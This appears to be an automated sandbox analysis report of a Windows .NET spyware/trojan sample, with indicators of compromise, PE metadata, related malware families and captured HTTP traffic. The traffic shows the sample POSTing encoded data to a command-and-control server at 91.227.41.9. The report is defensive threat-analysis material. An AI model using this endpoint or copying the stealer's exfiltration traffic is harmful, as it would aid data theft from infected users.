https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.jiyu-kobo.co.jp/	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	RyroOfX8Xr.5.dr	false		high
http://www.urwpp.deDPlease	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	dllhost.exe, 00000005.00000002.4116814667.00000000144E5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014744000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001396F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001449F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014670000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138E3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139B5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013785000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014789000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001389D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014815000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147CF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139FB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001462A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146FC000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013811000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013929000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001459E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	eu6OEBpBCI.exe, 00000000.00000002.1686320496.00000000032E7000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.227.41.9	unknown	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571109
Start date and time:	2024-12-09 00:26:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eu6OEBpBCI.exe renamed because original name is a hash value
Original Sample Name:	17d1a3b2d87457f2492926349fae2417.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/346@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: eu6OEBpBCI.exe

Simulations

Behavior and APIs

Time	Type	Description
18:27:12	API Interceptor	11237215x Sleep call for process: dllhost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ECO-ATMAN-PLECO-ATMAN-PL	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	185.36.171.17
	Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	9zldYT23H2.elf	Get hash	malicious	Mirai, Gafgyt	Browse	31.186.82.2
	RicevutaPagamento_115538206.dat	Get hash	malicious	Unknown	Browse	128.204.223.111
	http://bdvenlineabanven.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://ahksoch.serv00.net/x92gamy6wh/	Get hash	malicious	HTMLPhisher	Browse	128.204.218.63
	http://intesa-it.serv00.net/it/conto/	Get hash	malicious	Unknown	Browse	85.194.246.69

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AHMSLlxy.log	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	A5EbyKyjhV.exe	Get hash	malicious	DCRat	Browse
	lfcdgbuksf.exe	Get hash	malicious	DCRat	Browse
	qNdO4D18CF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	iN1fhAtzW2.exe	Get hash	malicious	DCRat	Browse
	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	KPFv8ATDx0.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	main.exe	Get hash	malicious	DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\eu6OEBpBCI.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.0957952550009344
Encrypted:	false
SSDEEP:	3:+IB:+IB
MD5:	04A4667B1C0C84572179880839B074E9
SHA1:	0571203766DF424A21366B6962E9E898AEE8DEB1
SHA-256:	6CFBAE6AA91D1F177D8CF98CB4664805D3B08DBD8633B71F464BC419FD9A0FBE
SHA-512:	8D4D3A0381E77663D4A1FAC06243412F78868CB85A61A76AD75FA86CF7FF91BD6D8CAFA9BCA1D8B7E460432D3E64505EEA995ADA166CD7CFE3D2DAD64CC5365A
Malicious:	false
Reputation:	low
Preview:	0VKNNT3jT2d

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.618543484589417
Encrypted:	false
SSDEEP:	12:Pbl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:7dUOAokItULVDv
MD5:	385FA32869190D89EDB3801D4D2B9DA6
SHA1:	573C24017B7A1D1F7EBF7762FDF0C22FD768F910
SHA-256:	C8E47F3E310A26EF778572287CBECBA18A1813EB66DDB2E453992447F94CABCC
SHA-512:	8A5DA2BC94EA6C618078C0D03AEA95E37B113795DE5772210F72C44100CD885AB2D176ED4EA7FE2DC9325504CF698DC9DC01747AA72E2200F6394D1316289D7E
Malicious:	false
Preview:	..Pinging 128757 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.823106714932208
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	eu6OEBpBCI.exe
File size:	3'682'816 bytes
MD5:	17d1a3b2d87457f2492926349fae2417
SHA1:	5ffdb9a82faf2fc9dda683dc026e10376bc5a7bc
SHA256:	a15debb35819618dde10abc793552e6addf91baf38d2025c274d84fdcedb97fa
SHA512:	0f76d1c698295e6b2d1ea94a8fed8388754a4aaaf25ed0e25cc7ef9eeea91f0bd8da3240843acf2cce15d7896d2b9c5859637d19c8b3ad24db11308274101775
SSDEEP:	98304:7hgFoJyp5aYSww8ceHQSIgLmJrvpFn4liKJMWSxur:76FoJyraUj4bn4059xu
TLSH:	5106E00AA5D25E33C1E93F3284D7103E42F0DB666522FF5B361F61A5AC0A671DB162B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*8..........H8.. ...`8...@.. ........................8...........@................................

Entrypoint:	0x7848ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3848a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x386000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x388000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3828f4	0x382a00	42673830c3e37c0125733bc51c11e04b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x386000	0x370	0x400	f5b4b040117b4857518a5167ac8e6846	False	0.376953125	data	2.8641840753628585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x388000	0xc	0x200	59b3ab918b7da865038c460568333f58	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:11.547744989 CET	261	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:11.906604052 CET	344	OUT	Data Raw: 00 07 04 05 03 0a 01 02 05 06 02 01 02 01 01 04 00 0a 05 0e 02 04 03 0b 07 06 0e 07 04 05 01 02 0e 05 03 0e 00 03 04 57 0f 00 02 03 00 06 02 01 07 02 0c 00 0c 05 07 52 05 06 04 54 07 05 00 09 05 00 0f 0d 05 53 04 56 0c 02 0b 04 0e 02 0c 04 04 0d Data Ascii: WRTSVWQQ\L}P\|py^traLuKlklywc]cxJ{UxYz`uX\|nRvt\|N~O~V@{C\}r}
Dec 9, 2024 00:27:12.816457033 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:12.842915058 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:12 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 1360 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7e 4c 7b 53 55 00 7b 04 74 04 7f 61 67 06 69 59 51 0c 6b 5e 7d 41 7b 73 60 42 69 04 6f 5b 77 63 69 0a 6e 61 61 07 62 65 7c 02 6a 61 78 01 55 4b 71 08 77 62 7c 58 6b 62 57 4d 68 77 75 54 79 75 6f 50 7d 70 7c 59 77 61 6a 5e 77 07 7d 05 68 61 62 03 7e 42 6c 09 7f 77 7f 49 76 5c 7b 06 7c 5b 76 5c 7e 59 7d 07 7b 67 55 5c 7b 01 6c 42 78 54 74 59 6e 5c 78 01 6f 5d 54 04 6b 4e 55 59 7b 49 70 00 69 71 73 04 75 07 6c 47 7a 51 41 5b 7d 74 60 42 68 62 65 0a 76 42 5e 03 6c 6f 7c 04 60 5e 62 0a 79 72 72 5a 7c 7c 50 4f 6f 71 5b 5d 76 63 73 4a 76 4f 7f 5c 60 62 7a 50 7e 5d 7a 06 74 71 7d 00 61 65 52 09 7f 7f 75 01 60 6f 7c 04 68 63 6c 06 6f 6f 73 03 6f 5e 66 01 7c 6d 68 08 74 74 7c 03 69 62 76 09 7e 0b 7b 0c 6c 43 66 4c 7e 62 7e 5f 7b 5d 46 51 7d 6c 73 51 7d 59 67 54 7e 74 7d 58 78 54 7f 01 78 5b 78 02 6b 58 7c 5a 69 74 73 09 7c 63 61 4f 6d 5d 55 5d 6a 72 70 03 74 73 57 51 7b 5c 79 00 76 48 5a 4a 7d 58 5a 07 7e 48 7d 40 77 4c 73 02 7f 4c 57 00 7f 77 54 43 7b 66 68 4f 7d 73 7f 03 75 4c 6d 4e 76 71 61 49 7f 71 [TRUNCATED] Data Ascii: VJ~L{SU{tagiYQk^}A{s`Bio[wcinaabe\|jaxUKqwb\|XkbWMhwuTyuoP}p\|Ywaj^w}hab~BlwIv\{\|[v\~Y}{gU\{lBxTtYn\xo]TkNUY{IpiqsulGzQA[}t`BhbevB^lo\|`^byrrZ\|\|POoq[]vcsJvO\`bzP~]ztq}aeRu`o\|hclooso^f\|mhtt\|ibv~{lCfL~b~_{]FQ}lsQ}YgT~t}XxTx[xkX\|Zits\|caOm]U]jrptsWQ{\yvHZJ}XZ~H}@wLsLWwTC{fhO}suLmNvqaIqTK}R`}gUDu_wx\}}`[J{I`CywRxSYIyLVx]TA^ZxYlI}L]Oua`\|\|\|YR}auvBxx\|pt`f@{qa~RbL{_vvcvqVwqnNpjtLyLwuRO\|\|utB\|L\|MhIy\|{{`Pmp@tI^Nbv@}SQxCfL~r[N\|^t}lhC~^Z@}w\Mx}sK{Ld\|aQ}gopqy]\|}\dt]WzaivHt}fp}XivrYDLeB\|gjxX^\|s{uraOwqiG\|O~H}\|d~YUJuOczbSH\|`[{wRC{g^{SQyr`KxM\{]NZywlirQObXpjRQhgkSqaw\|{ZxB]YtpeTyabXiUb_z\y\}b`g{ZL~Jx^zvquv[oS\|RX^vohhMc[ylZ^ocuZhTl@`IxAi~zSYQQTgia~EhlcOQUUilcTzZ@]o~ybk[k_Z^}xPcuyM^jbpHwMunqf^b_d~_x^\KQcdEQqHh_LnsTPod\[i_v\q}_b\|Rp@}JJu_UYyur^icDT{oZWdSo^Re\|\|\ZVM{iTAz_A^bcFPNh]Mj~UbU@WQxp_UPLvjQyD\|\DXb`E[rMc[Liy[cTCZZwNke\vQszfdp@UR^Wq@Vn]I[_OjaSHQwln
Dec 9, 2024 00:27:12.842976093 CET	353	IN	Data Raw: 5a 79 5c 5f 5e 66 59 67 0b 7b 7e 55 4f 53 59 42 51 7f 70 7d 5a 6f 6e 0b 44 54 7e 67 5f 50 62 07 55 6a 01 0f 09 53 5a 62 41 51 62 77 43 6a 71 60 58 76 5e 7a 6e 61 4c 79 40 71 5f 55 5e 51 01 73 44 54 65 5c 48 5b 5a 0b 59 50 05 66 40 56 7b 79 0c 62 Data Ascii: Zy\_^fYg{~UOSYBQp}ZonDT~g_PbUjSZbAQbwCjq`Xv^znaLy@q_U^QsDTe\H[ZYPf@V{yb_Lid{qZnCXmj\kvqeTsjkZtvx^oaGQ\|n]WdRo@R~^Dmad]hgpXqz_A^bcFPNh]MjzOZVkFWUgD]qQVbaY\|QyyWyYttqZbcOXbyQx]D^cnC[vAk\@aA]UpURod^\|^\Z\|}xLwI
Dec 9, 2024 00:27:13.075114012 CET	237	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 384 Expect: 100-continue
Dec 9, 2024 00:27:13.445909977 CET	384	OUT	Data Raw: 5c 5e 43 50 5d 43 50 5f 54 57 5b 51 55 5b 59 5f 50 5e 5a 59 56 52 57 53 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \^CP]CP_TW[QU[Y_P^ZYVRWSX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'&-1X(987853<+P<9<77T5/+_<!,<&\"'Z,$
Dec 9, 2024 00:27:13.480319977 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:13.854285002 CET	324	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:13 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0f 13 3a 09 31 1f 28 00 3d 0d 2e 0d 28 02 23 58 2d 2f 0e 1e 28 0e 25 13 25 2e 2c 0c 26 28 36 12 28 3e 05 5f 27 1c 2a 08 30 37 33 1d 2a 12 2f 58 07 1c 27 11 2b 28 3b 1e 25 23 03 04 3d 21 3f 5d 26 5b 3c 5c 30 10 2c 13 24 0d 3b 03 28 55 22 0e 27 3b 39 16 3f 15 34 5f 39 34 30 1e 22 34 23 53 08 11 25 57 30 57 24 12 27 2f 09 06 36 33 3e 1f 25 38 38 0c 29 3f 28 5f 2b 20 2d 12 2a 32 21 0e 33 1c 24 1f 24 01 34 59 24 1d 26 52 26 00 26 54 2a 00 23 56 03 31 57 50 Data Ascii: :1(=.(#X-/(%%.,&(6(>_'073/X'+(;%#=!?]&[<\0,$;(U"';9?4_940"4#S%W0W$'/63>%88)?(_+ -2!3$$4Y$&R&&T#V1WP
Dec 9, 2024 00:27:13.915473938 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1856 Expect: 100-continue
Dec 9, 2024 00:27:14.265125990 CET	1856	OUT	Data Raw: 59 5c 43 51 5d 40 55 5d 54 57 5b 51 55 50 59 5f 50 5a 5a 59 56 56 57 5d 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y\CQ]@U]TW[QUPY_PZZYVVW]X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'X3.<345'^<$4?3#:<5<()5W'<?&\"'Z,
Dec 9, 2024 00:27:14.320184946 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:14.815012932 CET	324	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:14 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0f 13 39 12 25 1f 23 5b 3d 33 2a 08 2b 3f 2f 1b 3a 11 0a 10 3c 56 3e 03 31 00 3f 1f 26 06 2a 1d 2b 2e 28 06 27 0c 22 08 30 37 37 1e 3e 28 2f 58 07 1c 24 00 2b 05 27 10 31 23 32 5e 29 31 3f 5a 31 5b 20 5f 24 07 2f 00 33 23 3c 12 2b 23 25 1c 32 38 26 0a 3f 15 0d 07 2d 19 2b 0d 35 0e 23 53 08 11 26 0e 24 0f 34 5a 32 01 28 5a 36 55 3e 1c 33 15 2b 50 3e 5a 38 5f 2b 23 0f 5e 28 32 22 11 30 0c 3c 11 30 3c 3c 5f 24 33 0c 51 24 3a 26 54 2a 00 23 56 03 31 57 50 Data Ascii: 9%#[=3+?/:<V>1?&+.('"077>(/X$+'1#2^)1?Z1[ _$/3#<+#%28&?-+5#S&$4Z2(Z6U>3+P>Z8_+#^(2"0<0<<_$3Q$:&T*#V1WP

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:13.266706944 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
